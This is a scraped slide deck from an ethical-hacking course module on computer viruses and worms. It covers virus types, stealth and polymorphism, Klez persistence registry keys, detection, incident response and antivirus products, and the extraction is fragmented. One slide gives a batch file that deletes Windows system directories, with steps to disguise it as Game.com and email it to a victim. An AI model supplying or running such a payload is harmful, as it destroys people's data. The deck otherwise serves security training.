Upload
jellycandeal
View
221
Download
0
Embed Size (px)
Citation preview
8/14/2019 16 Virus and Worms
1/85
Module XVIVirus and Worms
Ethical HackingVersion 5
8/14/2019 16 Virus and Worms
2/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Case Study
8/14/2019 16 Virus and Worms
3/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
8/14/2019 16 Virus and Worms
4/85
8/14/2019 16 Virus and Worms
5/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Module Objective
This module will familiarize you with the following: Virus
History of Virus Different characteristics and types of virus
Basic symptoms of virus-like attack
Difference between Virus and Worm
Virus Hoaxes Indications of virus attacks
Basic working and access methods of virus
Various damages caused by virus
Life cycle of virus
Virus Infection
Various virus detection techniques
Top ten virus of 2005
Virus incident response
8/14/2019 16 Virus and Worms
6/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Module Flow
Introduction to VirusCharacteristics and
Types of virus
Symptoms of Virus attack
Access methods of virus Indications of Virus Attack Virus Hoaxes
Life cycle of virus Virus Infection Writing a sample Virus code
Virus Detection and DefensesAnti-Virus SoftwareVirus incident response
8/14/2019 16 Virus and Worms
7/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Introduction to Virus
Computer viruses are perceived as a threat to both businessand personnel
Virus is a self-replicating program that produces its owncode by attaching copies of itself into other executable codes
Operates without the knowledge or desire of the computer
user
8/14/2019 16 Virus and Worms
8/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus History
Slammer, Sobig, Lovgate, Fizzer, Blaster/Welchia/Mimail2003
Email-Worm.Win32.Zafi.d, Net-Worm.Win32.Mytob.t2005
I-Worm.NetSky.r, I-Worm.Baqle.au2004
Melissa, Corner, Tristate, & Bubbleboy1999
Strange Brew & Back Orifice1998
Concept1995AIDS Trojan
1989
Brain, PC-Write Trojan, & Virdem1986
First Documented Virus1983Apple II Virus- First Virus in the wild1981
Viru s NameYear o fDiscovery
8/14/2019 16 Virus and Worms
9/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Characteristics of a Virus
Resides in the memory and replicates
itself while the program where it attached,
is running
Does not reside in the memory after the
execution of program
Can transform themselves by changingcodes to appear different
Hides itself from detection by three ways:
Encrypts itself into cryptic symbols
Alters the disk directory data to
compensate the additional virus bytes
Uses stealth algorithms to redirect disk
data
8/14/2019 16 Virus and Worms
10/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Working of Virus
Trigger events and direct attack are the common modeswhich cause a virus to go off on a target system
Most viruses operate in two phases: Infection Phas e:
Virus developers decide when to infect host systems programs
Some infect each time they are run and executed completely
Ex: Direct Viruses
Some virus codes infect only when users trigger them whichinclude a day, time, or a particular event
Ex: TSR viruses which get loaded into memory and infect at laterstages
Attack Pha se:
Some viruses have trigger events to activate and corruptsystems
Some viruses have bugs which replicate and perform activitieslike file deletion, increasing session time
They corrupt the targets only after spreading completely asintended by their developers
8/14/2019 16 Virus and Worms
11/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Working of Virus: Infection Phase
File Heade rFile Heade r
IP IP
Start ofProgram
End of Program
Virus Jum p
. EXE File . EXE File
BeforeInfection
AfterInfection
Start ofProgram
End ofProgram
Attaching .EXE File to Infect the Programs
8/14/2019 16 Virus and Worms
12/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Working of Virus: Attack Phase
Page: 3Page: 2Page: 1 Page: 3Page: 2Page: 1
Unfragmented File Before Attack
Source: www.microsoft.com
File: A File: B
Page: 1
File: B
Page: 3
File: B
Page: 1
File: A
Page: 2
File: A
Page:2
File: B
Page: 3
File: A
File Fragmentation Due to Virus Attack
Slowdown of PC due to Fragmented Files
8/14/2019 16 Virus and Worms
13/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Why People create computer viruses?
Virus writers can have various reasons for creating andspreading malware
Viruses have been written as:
Research projects
Pranks
Vandalism To attack the products of specific companies
To distribute political messages
Financial gain
Identity theft
Spyware
Cryptoviral extortion
8/14/2019 16 Virus and Worms
14/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Symptoms of Virus-Like Attack
If the system acts in an unprecedented manner, you can suspect a virus attack
Example: Processes take more resources and are time consuming
However, not all glitches can be attributed to virus attacks Examples include:
Certain hardware problems
If computer beeps with no display
If one out of two anti-virus programs report virus on the system
If the label of the hard drive change
Your computer freezes frequently or encounters errors
Your computer slows down when programs are started
You are unable to load the operating system
Files and folders are suddenly missing or their content changes Your hard drive is accessed too often (the light on your main unit flashes rapidly)
Microsoft Internet Explorer "freezes"
Your friends mention that they have received messages from you but you never sent suchmessages
8/14/2019 16 Virus and Worms
15/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus Hoaxes
Hoaxes are false alarms claiming reports abouta non-existing virus
Warning messages propagating that a certainemail message should not be viewed and doingso will damage ones system
In some cases, these warning messages
themselves contain virus attachments
They possess capability of vast destruction ontarget systems
Being largely misunderstood, viruses easilygenerate myths. Most hoaxes, whiledeliberately posted, die a quick death becauseof their outrageous content
8/14/2019 16 Virus and Worms
16/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus Hoaxes
8/14/2019 16 Virus and Worms
17/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Chain Letters
8/14/2019 16 Virus and Worms
18/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
How is a Worm different from a Virus?
There is a difference between
generalviruses andwormsA worm is a special type of virus
that can replicate itself and use
memory, but cannot attachitselfto other programs
A worm spreads through the
infected networkautomatically
but a virus does not
8/14/2019 16 Virus and Worms
19/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Indications of Virus Attack
Indications of a virus attack:
Programs take longer to load than normal Computer's hard drive constantly runs out of free space
Files have strange names which are not recognizable
Programs act erratically
Resources are used up easily
8/14/2019 16 Virus and Worms
20/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Hardware Threats
Pow er Faults:
Sudden power failure, voltage spikes, brownout and frequency shifts causedamage to system
System Life:
System gets worn-out over a period of time
Equipme nt Incom patibilities:
These occur due to improperly installed devices Typos:
Data gets corrupted due to deletion or replacement of wrong files
Accidental or M alicious Dam age:
Data gets deleted or changed accidentally or intentionally by other person Problems with Magnets:
Magnetic fields due to floppy disk, monitor, and telephone can damagestored data
8/14/2019 16 Virus and Worms
21/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Software Threats
Softw are Problems:
In multitasking environment, software conflicts may occur due to
sharing of data by all running programs at the same time
There may be damage of information due to misplacement of datain a program
Softwar e Attacks: Intentionally launched malicious programs enable the attacker to
use the computer in an unauthorized manner
General Categories:
Viruses and worms
Logic bombs
Trojans
8/14/2019 16 Virus and Worms
22/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus Damage
Virus damage can be grouped broadly under:
Technical Attribu tes: The technicalities involved in the
modeling and use of virus causes damage due to:
Lack of control
Difficulty in distinguishing the nature of attack
Draining of resources
Presence of bugs
Compatibility problems
8/14/2019 16 Virus and Worms
23/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus Damage (contd)
Virus damage can be further attributed to:
Ethical and Legal Reasons: There are ethics andlegalities that rule why virus and worms are damaging
Psychological Reasons: These are:
o Trust Problems
o Negative influence
Unauthorized data modification
Issue of Copyright
Misuse of the virus
Misguidance by virus writers
8/14/2019 16 Virus and Worms
24/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Modes of Virus Infection
Viruses infect the system in the following
ways:
1. Loads itself into memory and checks for
executables on the disk
2. Appends the malicious code to a legitimate
program unbeknownst to the user3. Since the user is unaware of the replacement,
he/she launches the infected program
4. As a result of the infected program beingexecutes, other programs get infected as well
5. The above cycle continues until the user
realizes the anomaly within the system
8/14/2019 16 Virus and Worms
25/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Stages of Virus Life
Computer virus involves various stages right from its design toelimination
Replication
Design
Launch
Detection
Incorporation
Elimination Users are advised to install anti-virussoftware updates thus creatingawareness among user groups
Anti-virus software developers assimilatedefenses against the virus
A virus is identified as threatinfecting target systems
It gets activated with user performing certain actionslike triggering or running a infected program
Virus first replicates for a long period of time within thetarget system and then spreads itself
Developing virus code using programminglanguages or construction kits
8/14/2019 16 Virus and Worms
26/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus Classification
Viruses are classifiedbased on the following
criteria:
What they Infect
How they Infect
8/14/2019 16 Virus and Worms
27/85
8/14/2019 16 Virus and Worms
28/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
How does a Virus Infect?
Stealth Vir us:
Can hide from anti-virus programs
Polym orphic Virus:
Can change their characteristics with each infection
Cavity Viru s:
Maintains same file size while infecting
Tunneling Viru s:
They hide themselves under anti-virus while
infecting
Camou flage Virus:
Disguise themselves as genuine applications of user
8/14/2019 16 Virus and Worms
29/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Storage Patterns of a Virus
Shell Virus:
Virus code forms a shell around target host programs code, making itself theoriginal program and host code as its sub-routine
Add-on Virus:
Appends its code at the beginning of host code without making any changes to thelatter one
Intrusive Virus:
Overwrites the host code partly, or completely with viral code
Direct or Transient Virus:
Transfers all the controls to host code where it resides
Selects the target program to be modified and corrupts it
Terminate and Stay Resident Virus (TSR):
Remains permanently in the memory during the entire work session even after thetarget host program is executed and terminated
Can be removed only by rebooting the system
8/14/2019 16 Virus and Worms
30/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
System Sector Viruses
System sectors are special areas on yourdisk containing programs that are
executed when you boot (start) your PC System sectors (Master Boot Record and
DOS Boot Record) are often targets forviruses
These boot viruses use all of the commonviral techniques to infect and hidethemselves
They rely on infected floppy disk left inthe drive when the computer starts, theycan also be "dropped" by some fileinfectors or Trojans
8/14/2019 16 Virus and Worms
31/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Stealth Virus
These viruses evade anti-virus software by intercepting its requests tothe operating system
A virus can hide itself by intercepting the anti-virus softwares requestto read the file and passing the request to the virus, instead of the OS
The virus can then return an uninfected version of the file to the anti-virus software, so that it appears as if the file is "clean"
Give me the system
file tcpip.sys to scan
Original TCPIP.SYS
Infected TCPIP.SYS
Here you go
ANTI-VIRUS SOFTWARE
VIRUS
8/14/2019 16 Virus and Worms
32/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Bootable CD-ROM Virus
These are a new type of virus that destroys the hard disk data contentwhen booted with the infected CD-ROM
Example: Someone might give you a LINUX BOOTABLE CD-ROM When you boot the computer using the CD-ROM, all your data is
gone
No Anti-virus can stop this because AV software or the OS is not evenloaded when you boot from a CD-ROM
Boot your computer usinginfected Virus CD-ROM
Your C: drive data is destroyed
8/14/2019 16 Virus and Worms
33/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Self-Modification
Most modern antivirus programs try to find virus-patterns insideordinary programs by scanning them forvirus signatures
A signature is a characteristic byte-pattern that is part of a certainvirus or family of viruses
Self-modification viruses employ techniques that make detection bymeans of signatures difficult or impossible
These viruses modify their code on each infection (each infected filecontains a different variant of the virus)
Explorer.exe sales.jpg Purchase.pdf
8/14/2019 16 Virus and Worms
34/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Encryption with a Variable Key
This type of virus use simple encryption to encipher thecode
The virus is encrypted with a different key for eachinfected file
AV scanner cannot directly detect these types of viruses
using signature detection methods
Virus.exeVirus.exe (encrypted)
8/14/2019 16 Virus and Worms
35/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Polymorphic Code
A well-written polymorphic virus therefore has no parts that stay thesame on each infection
To enable polymorphic code, the virus has to have a polymorphicengine (also called mutating engine or mutation engine)
Polymorphic code is a code that mutates while keeping the originalalgorithm intact
8/14/2019 16 Virus and Worms
36/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Metamorphic Virus
Metamorphic viruses rewrite themselves completely each time theyare to infect new executables
Metamor phic code is a code that can reprogram itself bytranslating its own code into a temporary representation, and then
back to normal code again
For example, W32/Simile consisted of over 14000 lines of assembly
code, 90% of it is part of the metamorphic engine
8/14/2019 16 Virus and Worms
37/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Cavity Virus
Cavity Virus overwrites a part of the host file that is filled
with a constant (usually nulls), without increasing thelength of the file, but preserving its functionality
Null Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null NullNull Null Null Null Null Null
Null Null Null Null Null Null
Sales & MarketingManagement is the leadingauthority for executives inthe sales and marketingmanagement industries. Thesuspect, Desmond Turner,surrendered to authorities ata downtown Indianapolisfast-food restaurant.
Original File Size: 45 KB
InfectedFile Size: 45 KB
8/14/2019 16 Virus and Worms
38/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Sparse Infector Virus
Sparse infector virus infects only occasionally (e.g. everytenth program executed), or only files whose lengths fall
within a narrow range By infecting less often, such viruses try to minimize the
probability of being discovered
Wake up on 15th of everymonth and execute code
8/14/2019 16 Virus and Worms
39/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Companion Virus
A Companion virus creates a companion file for eachexecutable file the virus infects
Therefore a companion virus may save itself asnotepad.com and every time a user executesnotepad.exe (good program ), the computer will load
notepad.com (viru s) and therefore infect the system
Virus infects the system with a filenotepad.com and saves it inc:\winnt\system32 directory
Notepad.comNotepad.exe
8/14/2019 16 Virus and Worms
40/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
File Extension Virus
File extension viruses change theextensions of files
.TXT is safe as it indicates a pure text
file With extensions turned off if
someone sends you a file namedBAD.TXT.VBSyou will only seeBAD.TXT
If you've forgotten that extensionsare actually turned off, you mightthink this is a text file and open it
This is really an executable Visual
Basic Script virus file and could doserious damage
Countermeasure is to turn off Hidefile extensions in Windows
Famous Viruses /Worms
8/14/2019 16 Virus and Worms
41/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Famous Viruses /WormsI Love You Virus
Love Letter is a Win32-basedemail worm. It overwritescertain files on the hard drivesand sends itself out to everyonein the Microsoft Outlookaddress book
Love Letter arrives as an emailattachment named: LOVE-LETTER-FORYOU. TXT.VBSthough new variants havedifferent names including
VeryFunny.vbs,virus_warning.jpg.vbs, andprotect.vbs
The virus discussed here are more
of a proof of concept, as they havebeen instrumental in the evolutionof both virus and anti-virusprograms
Classic tool presented here for proof of concept
8/14/2019 16 Virus and Worms
42/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Melissa Virus
Melissa is a Microsoft Word
macro virus. Through macros,
the virus alters the MicrosoftOutlook email program so that
the virus gets sent to the first 50
people in the address book
It does not corrupt any data onthe hard drive or crashes the
computer. However, it affects
MS Word settings
Melissa arrives as an email attachment.The subject of the message containing the virus
reads: "Important message from" followed by thename of the person whose email account it was sentfrom
The body of the message reads: Here's the document you asked for...don't show anyone else ;-)Double-clicking the attached Word document (typically named LIST.DOC) will infect themachine
Classic tool presented here for proof of concept
8/14/2019 16 Virus and Worms
43/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Melissa Virus Case
8/14/2019 16 Virus and Worms
44/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Famous Virus/Worms JS.Spth
JavaScript Internet worm
Propagates via email, ICQ and P2P networks
Kit-Spth is used to produce JS/SPTH worm
Infection Strategies:
Ms-OutLook Morpheus
Grokster
MIrc pIrc
vIrc
Kazaa
Kazaa-Lite
Bear Share
symLink
8/14/2019 16 Virus and Worms
45/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Klez Virus Analysis - 1
Klez virus arrives as an email attachment that
automatically runs when viewed or previewed in
Microsoft Outlook or Outlook Express
It is a memory-resident mass-mailing worm that
uses its own SMTP engine to propagate via email
Its email messages arrive with randomly selected
subjects
It spoofs its email messages so that they appear tohave been sent by certain email accounts, including
accounts that are not infected
8/14/2019 16 Virus and Worms
46/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Kl Vi A l i
8/14/2019 16 Virus and Worms
47/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Klez Virus Analysis - 2
Klez Virus arrives via E-Mail
8/14/2019 16 Virus and Worms
48/85
Kl Vi A l i
8/14/2019 16 Virus and Worms
49/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Klez Virus Analysis - 4
Autorun Techniques
This worm creates the following registry entry so that it executes
at every Windows startup:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\Run
Winkabc
It registers itself as a process so that it is invisible on the
Windows Taskbar
On Windows 2000 and XP, it sets itself as a service bycreating the following registry entry:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Serv
ices Winkabc
Kl Vi A l i
8/14/2019 16 Virus and Worms
50/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Klez Virus Analysis - 5
Payload
Once the victims computer is infected, the Klez virusstarts propagating itself to other users throughMicrosoft Outlook contact list
[email protected]@xxxxxxxx.com
Klez Virus
W i i Si l Vi P
8/14/2019 16 Virus and Worms
51/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Writing a Simple Virus Program
1. Create a batch file Game.bat with the following text
@ echo off
del c:\winnt\system32\*.*
del c:\winnt\*.*
2. Convert the Game.bat batch file to Game.com using
bat2comutility
3. Send the Game.comfile as an email attachment to a
victim
4. When the victim runs this program, it deletes core files in
WINNT directory making Windows unusable
Writing a Test Virus Program
8/14/2019 16 Virus and Worms
52/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Writing a Test Virus Program
Sometimes it is unacceptable for you to send out real viruses to yournetwork for test or demonstration purposes
EICAR.ORG has created a test virus definition that is harmless and
will be picked by every AV program Type the following text in notepad and save the file as eicar.com
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
This file, eicar.com will be detected as Virus by your AV
You can also download this test virus fromhttp://www.eccouncil.org/cehtools/eicar.zip
Note: This slide is not in your courseware
Virus Construction Kits
8/14/2019 16 Virus and Worms
53/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus Construction Kits
Virus creation programs and construction
kits can automatically generate viruses
There are number of Virus construction kits
available in the wild
Some virus construction kits are:
Kefi's HTML Virus Construction Kit
Virus Creation Laboratory v1.0
The Smeg Virus Construction Kit
Rajaat's Tiny Flexible Mutator v1.1
Windows Virus Creation Kit v1.00
Examples of Virus Construction Kits
8/14/2019 16 Virus and Worms
54/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Examples of Virus Construction Kits
Virus Detection Methods
8/14/2019 16 Virus and Worms
55/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus Detection Methods
Scanning
Once a virus has been detected, it is possible
to write scanning programs that look forsignature string characteristic of the virus
Integrity Checking
Integrity checking products work by readingyour entire disk and recording integrity datathat acts as a signature for the files and systemsectors
Interception The interceptor monitors operating system
requests that write to disk
Virus Incident Response
8/14/2019 16 Virus and Worms
56/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus Incident Response
1. Detect the attack: Not all anomalous behavior can be
attributed to Viruses
2. Trace processes using utilities such as handle.exe,
listdlls.exe, fport.exe, netstat.exe, pslist.exe, and map
commonalities between affected systems
3. Detect the virus payload by looking for altered, replaced,
or deleted files. New files, changed file attributes, or
shared library files should be checked4. Acquire the infection vector, isolate it. Update anti-virus
and rescan all systems
What is Sheep Dip ?
8/14/2019 16 Virus and Worms
57/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
What is Sheep Dip ?
Slang term for a computer which connectsto a network only under strictly controlled
conditions, and is used for the purpose ofrunning anti-virus checks on suspect files,incoming messages and so on
It may be inconvenient and time-consuming fororganizations to give all incoming email attachment a'health check' but the rapid spread of macro-virusesassociated with word processor and spreadsheetdocuments, such as the 'Resume' virus circulating inMay 2000, makes this approach worthwhile
Sheep Dip Computer
8/14/2019 16 Virus and Worms
58/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Sheep Dip Computer
Run Port Monitor Run File Monitor
Run Registry MonitorRun Network Monitor
Run the virus in this
monitoredenvironment
Virus Analysis - IDA Pro Tool
8/14/2019 16 Virus and Worms
59/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Virus Analysis IDA Pro Tool
It is a dissembler and debugger tool that
supports both Windows and Linux platforms
It is an interactive, programmable, extendible,
multi-processor
Used in the analysis of hostile code andvulnerability research and software reverse
engineering
Allows automated unpacking/ decrypting of
protected binaries
IDA Pro (Virus Disassembler)
8/14/2019 16 Virus and Worms
60/85
EC-CouncilCopyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
IDA Pro (Virus Disassembler)
Virus Incident Response
8/14/2019 16 Virus and Worms
61/85
EC-CouncilCopyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
Virus Incident Response
1. Detect the Attack: Not all anomalous behavior can be
attributed to Viruses
2. Trace processes using utilities such as handle.exe,
listdlls.exe, fport.exe, netstat.exe, pslist.exe, and map
commonalities between affected systems
3. Detect the virus payload by looking for altered, replaced
or deleted files. Check new files, changed file attributes
or shared library files4. Acquire the infection vector, isolate it. Update anti-virus
and rescan all systems
Prevention is Better than Cure
8/14/2019 16 Virus and Worms
62/85
EC-CouncilCopyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
Prevention is Better than Cure
Do not accept disks or programs without
checking them first using a current
version of an anti-viral program
Do not leave a floppy disk in the disk drive
longer than necessary
Do not boot the machine with a disk in the
disk drive, unless it is a known Clean
bootable system disk Keep the anti-virus software up-to-date:
upgrade on a regular basis
Latest Viruses
8/14/2019 16 Virus and Worms
63/85
EC-CouncilCopyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
Latest Viruses
W32/Vulgar:
Overwriting virus with data
destructive payload Attempts to open default web
browser after execution, but resultsin Internet Explorer crashing
W32/Feebs.gen@MM:
Email worm type virus thatconfigures itself to load at startup
Spreads itself by email attachmentand infects the system afterexecution of attachment
W32/HLLP.zori.c@M:
Parasitic file infector
and mailing worm Possesses backdoor
functionality that allowsunauthorized remoteaccess
Top 10 Viruses- 2006
8/14/2019 16 Virus and Worms
64/85
EC-CouncilCopyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
p
Email-Worm.Win32.Zafi.d
Net-Worm.Win32.Mytob.c
Email-Worm.Win32.LovGate.w
Email-Worm.Win32.Sober.v
Email-Worm.Win32.Zafi.b
Email-Worm.Win32.NetSky.b
Email-Worm.Win32.NetSky.g
Net-Worm.Win32.Mytob.t Net-Worm.Win32.Mytob.u
Net-Worm.Win32.Mytob.g
Anti-Virus Software
8/14/2019 16 Virus and Worms
65/85
EC-CouncilCopyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
There are many anti-virus software vendors. Hereis a list of some freely available anti-virus softwarefor personal use:
AVG Free Edition
Norton Antivirus
AntiVir Personal Edition
Bootminder
Panda Active Scan
One of the preventions againstviruses is to install anti-virus
software and keep the updatescurrent
AVG Antivirus
8/14/2019 16 Virus and Worms
66/85
EC-CouncilCopyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
Menus in Basic Interface:
Program menu
Tests menu
Results menu
Service menu Menu information menu
AVG Settings and Features:
Program settings
Test properties
Test results
Task scheduler Update manager
Product ofwww.grisoft.com
AVG Antivirus
8/14/2019 16 Virus and Worms
67/85
EC-CouncilCopyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
AVG Antivirus
8/14/2019 16 Virus and Worms
68/85
EC-CouncilCopyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
Norton Antivirus
8/14/2019 16 Virus and Worms
69/85
EC-Council Copyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
Product ofwww.symantec.com
Features:
Protects from viruses, and updates virus definitions automatically
Detects and repairs viruses in emails, instant messenger attachments and
compressed folders
Monitors network traffic for malicious activity
Norton antivirus provides the following scan options:
Full system scan
Custom scan
Schedule scan
Scan from the command line
8/14/2019 16 Virus and Worms
70/85
Norton Antivirus
8/14/2019 16 Virus and Worms
71/85
EC-Council Copyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
McAfee
8/14/2019 16 Virus and Worms
72/85
EC-Council Copyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Product ofwww.mcafee.com
Features:
SpamKiller: Stops spam from infecting the inbox
SecurityCenter: Lists computer security vulnerabilities
Offers free real-time security alerts
VirusScan:ActiveShield: Scans the files in real time
Quarantine: Encrypts the infected files in the quarantine folder Hostile Activity Detection: Examines computer for malicious
activity
McAfee SpamKiller
8/14/2019 16 Virus and Worms
73/85
EC-Council Copyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
McAfee SecurityCenter
8/14/2019 16 Virus and Worms
74/85
EC-Council Copyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
McAfee VirusScan
8/14/2019 16 Virus and Worms
75/85
EC-Council Copyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Socketshield
8/14/2019 16 Virus and Worms
76/85
EC-Council Copyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
SocketShield is a zero-day exploit blocker
SocketShield can block exploits from entering the computer, regardless ofhow long it takes for the vendors of vulnerable applications to issue patches
http://www.explabs.com
Socketshield
8/14/2019 16 Virus and Worms
77/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Popular Anti-Virus Packages
8/14/2019 16 Virus and Worms
78/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Aladdin KnowledgeSystemshttp://www.esafe.com/
Central Command, Inc.http://www.centralcommand.com/
Computer Associates
International, Inc.http://www.cai.com
Frisk SoftwareInternational
http://www.f-prot.com/F-Secure Corporation
http://www.f-secure.com
Trend Micro, Inc.http://www.trendmicro.com
Norman Data DefenseSystemshttp://www.norman.com
Panda Software
http://www.pandasoftware.com/
Proland Softwarehttp://www.pspl.com
Sophoshttp://www.sophos.com
Virus Databases
8/14/2019 16 Virus and Worms
79/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
The following databases can beuseful if you are looking forspecific information about a
particular virus
Proland - Virus Encylopedia
http://www.pspl.com/virus_info/
Norman - Virus Encylopediahttp://www.norman.com/Virus/en-us
AVG - Virus Encyclopedia
http://www.grisoft.com/doc/Virus+Encyclopaedia/lng/us/tpl/tpl01
Virus Bu lletin - Virus Encyclopediahttps://www.virusbtn.com/login
F-Secur e Virus Info Cen ter
http://www.f-secure.com/vir-info/
McAfee - Virus Inform ation Library
http://vil.mcafee.com/
Panda Software - Virus Encyclopedia
http://www.pandasoftware.com/library/Sophos Virus Information
http://www.sophos.com/virusinfo/
Symantec AntiVirus Research Center
http://www.symantec.com/avcenter/index.html
Trend Micro - Virus Encyclopediahttp://www.antivirus.com/vinfo/virusencyclo/default.asp
What Happened Next?
8/14/2019 16 Virus and Worms
80/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Next day when he switched on his system, Ricky was
surprised at the irregular behavior of his system. Hissystem was hanging down frequently and strange error
messages were popping up. He suspected virus attack on
his system. He updated his anti-virus software which he
has not updated since long and scanned the system.
Scan result showed that his system was infected by a
deadly virus.
Summary
8/14/2019 16 Virus and Worms
81/85
EC-CouncilCopyright byEC-Council
All Rights reserved. Reproduction is strictly prohibited
Viruses come in different forms
Some are mere nuisances, others come with devastating
consequences Email worms are self replicating, and clog networks with
unwanted traffic
Virus codes are not necessarily complex It is necessary to scan the systems/networks for infections
on a periodic basis for protection against viruses
Antidotes to new virus releases are promptly made availableby security companies, and this forms the majorcountermeasure
8/14/2019 16 Virus and Worms
82/85
EC-Council
Copyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
8/14/2019 16 Virus and Worms
83/85
EC-Council
Copyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
8/14/2019 16 Virus and Worms
84/85
EC-Council
Copyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited
8/14/2019 16 Virus and Worms
85/85
EC-Council
Copyright byEC-CouncilAll Rights reserved. Reproduction is strictly prohibited